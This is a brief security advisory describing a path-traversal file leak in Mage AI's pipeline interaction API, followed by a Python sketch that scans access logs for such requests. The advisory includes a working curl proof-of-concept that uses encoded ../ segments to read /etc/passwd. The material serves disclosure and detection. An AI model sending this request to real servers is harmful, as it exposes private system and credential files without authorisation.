Mage AI pipeline interaction request remote arbitrary file leak
mage-ai
(,)
Mage AI allows remote users with the "Viewer" role to leak arbitrary files from the Mage server due to a path traversal in the "Pipeline Interaction" request.
curl -X GET 'http://localhost:6789/api/pipelines/example_pipeline/interaction/..%2F..%2F..%2F..%2Fetc%2Fpasswd?api_key=<USER API KEY>' \
  -H 'Authorization: Bearer <USER TOKEN>'
No mitigations are supplied for this issue.
No references are supplied for this issue.
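
A detection sketch for the request shown above, added here as an example and not taken from the advisory or from Mage AI's code: it percent-decodes the path segment after /interaction/ and flags identifiers that climb above their starting directory or are absolute paths. It goes slightly beyond the single request on the page by normalising nested percent-encoding and backslashes before checking. The access-log format, the sample lines and all function names are assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Route shape taken from the request shown in the advisory.
INTERACTION_RE = re.compile(r"^/api/pipelines/[^/]+/interaction/(.+)$")
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed access-log lines, not real traffic
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /api/pipelines/example_pipeline/interaction/chart_1?api_key=K HTTP/1.1" 200 512',
    '192.0.2.77 - - [01/Jan/2024:10:00:05 +0000] "GET /api/pipelines/example_pipeline/interaction/..%2F..%2F..%2F..%2Fetc%2Fpasswd?api_key=K HTTP/1.1" 200 1843',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /api/pipelines/example_pipeline/interaction/sub%2F..%2Fchart_2?api_key=K HTTP/1.1" 200 498',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /api/pipelines/example_pipeline?api_key=K HTTP/1.1" 200 2048',
]


def fully_decode(value, max_rounds=5):
    """Percent-decode until stable so nested encoding is normalised first."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(request_target):
    """True if the interaction identifier leaves its starting directory."""
    match = INTERACTION_RE.match(urlsplit(request_target).path)
    if not match:
        return False
    ident = fully_decode(match.group(1)).replace("\\", "/")
    if ident.startswith("/") or "\x00" in ident:
        return True  # absolute path or NUL byte: never a valid identifier
    depth = 0  # directory depth relative to where the identifier starts
    for seg in ident.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def flag_log_lines(lines):
    """Return the log lines whose request target is a traversal attempt."""
    return [l for l in lines
            if (m := REQUEST_RE.search(l)) and is_traversal(m.group(1))]
```

Calling `flag_log_lines(SAMPLE_LOG)` returns only the second line; the `sub%2F..%2Fchart_2` request is not flagged because it never rises above its starting directory.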